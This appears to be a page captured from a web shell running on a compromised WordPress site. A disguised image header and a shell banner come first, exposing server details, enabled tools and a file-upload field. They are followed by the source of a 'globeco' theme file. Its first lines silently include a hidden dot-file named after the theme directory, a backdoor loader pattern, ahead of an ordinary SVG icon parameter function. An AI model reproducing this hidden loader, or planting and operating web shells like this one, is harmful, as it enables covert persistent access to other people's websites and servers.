????JFIF??x?x????'
Server IP : 104.21.16.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/eaabusiness.com/wp-content/themes/globeco/vc/params/ |
Upload File : |
<?php if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } function cws_vc_svg ( $settings, $value ){ $svg = json_decode($value, true); $svg_content = ''; if (!empty($svg) && function_exists('cwssvg_shortcode')) { $svg_content = cwssvg_shortcode($svg); } $output = '<div class="my_param_block" style="display: inline-block; min-width: 100px;">' .'<input name="' . esc_attr( $settings['param_name'] ) . '" class="wpb_vc_param_value wpb-textinput ' . esc_attr( $settings['param_name'] ) . ' ' . esc_attr( $settings['type'] ) . '_field" type="text" hidden value="' . esc_attr( $value ) . '" />'; $output .= "<a href='#' class='cws_svg_icon' style='" . (!empty($value) ? "display:none;" : "") . "'>Add</a>"; $output .= "<a href='#' class='cws_svg_icon_remove' style='color: red; " . (empty($value) ? "display:none;" : "") . "'>Remove</a>"; $output .= $svg_content; $output .= "</div>"; return $output; } ?>